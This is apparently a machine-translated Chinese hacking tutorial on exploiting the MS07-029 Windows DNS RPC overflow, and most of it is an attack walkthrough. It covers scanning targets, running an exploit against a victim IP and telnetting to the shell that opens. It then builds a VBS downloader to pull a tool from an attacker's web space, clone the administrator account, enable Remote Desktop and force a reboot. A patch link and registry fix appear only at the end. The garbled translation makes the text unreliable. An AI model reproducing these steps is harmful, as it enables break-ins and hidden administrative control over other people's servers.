MS07-0 2 9-Microsoft stay injury-vulnerability and early warning-the black bar safety net

Author: day の wing httP://Shit.Xmd5.com

Tool on My Network Hard Drive http://free. ys168. com/? okdgltc

Directory: dd password: ddd

Preface:
MS07-0 2 9, Windows A domain name System (DNS) Server service Remote Procedure Call (RPC) management interface in the presence of a stack-based buffer overflow. The vulnerability of the premise is not patched, turn on the DNS service for all versions of WINDOWS 2 0 0 0 Server and WINDOWS 2 0 0 3 Server.

Today, let me lead the way heroes, embark on a DNS EXP.

We first look at the tool interface:

!

This is the legendary to use the tool, can pass to kill 2000SEVER, the 2003SEVER system, in addition also has a scan feature!

First with the IT to the host to scan:
In our command line input:“dns –s target IP address”

!

Wait a moment, open the port andoperating systemto appear in front of us, if there is a as on the figure“1 0 2 9:Vulnerability”then congratulations, you’re successful to give the hosts permission.
On the figure means that 1 0 2 9 port the presence of vulnerabilities.

Now we come to the most critical steps-overflow:
At the command line enter
dns-2003chs .. 9 3. 1 8 9 1 0 2 9
Wherein-2003ch meanoperating systemthe model-2003chs that the Simplified Chinese version of the 2 0 0 3 System
If 2 0 0 0 the system will use the“-2000all”parameter,.. 9 3. 1 8 9 is our target IP address, 1 0 2 9’s just scan the vulnerabilities of the port.”

!

The emergence of“Attack sent ,check port 1 1 0 0”, Description have opened up the destination address 1 1 0 0 port, our TELNET up to: TELNET .. 9 3. 1 8 9 1 1 0 0

!

We now have successfully invaded the other’s computer and give the administrator permissions.

Below I give everybody to introduce how to in the broiler above the opening 3 3 8 9, The
In the command line input

@echo with wscript:if . arguments. count^<2 then . quit:end if > tony. vbs
@echo set aso=. createobject(“adodb. stream”):set web=createobject(“microsoft. xmlhttp”) >> tony. vbs
@echo web. open “get”,. arguments(0),0:web. send:if web. status^>2 0 0 then . echo “Error:”+web. status:. quit >> tony. vbs
@echo aso. type=1:aso. open:aso. write the web. responsebody:aso. savetofile . arguments(1),2:end with >> tony. vbs

Probably the meaning is in the command line to create a used to download the VBS script tony. vbs

Then put on 3 3 8 9 tool uploaded to your personal space,

I used here is Firefox open 3 3 8 9 of the tool in the command line input

cscript tony. vbs http:// 你 空间 地址 /wrsky.exe c:\wrsky.exe

!

“wrsky.exe -c”you can clone the current administrator account

Then input“c:\wrsky.exe -o 3 5 5 1”

!

Mean is open the other Remote Desktop Services, and the use of 3 5 5 1 port.

“Wrsky.exe -k”you can check 3 3 8 9 is turned on, turned on after the input“wrsky.exe -r”,the other computer will automatically reboot after it can be connected up.
In Run type"mstsc",landing up.

!

That familiar and intimate picture appeared in front of us.

If it is 2K’s system, there is a more fool tool open3389, directly run on it, does not require any parameters, but the other computer will immediately restart.

In addition I also put the other two DNS to use the tool and an article ZWELL the essence of the article in CD, interested friends can own research.

This vulnerability is is enormous, the current use of the DNS service RPC vulnerability to propagate the worm-VanBot has appeared, the variant has a crazy spread.

WIN 2K or 2 0 0 3 friends please hurry up and download the patch
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx

Or open Notepad, enter:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]

“RpcProtocol”=dword:0 0 0 0 0 0 0 4

Save for the extension . REG file, double-click Import, and then restart the DNS service.

Finally Thank you profession owe money brothers and my lovely GF for this article help.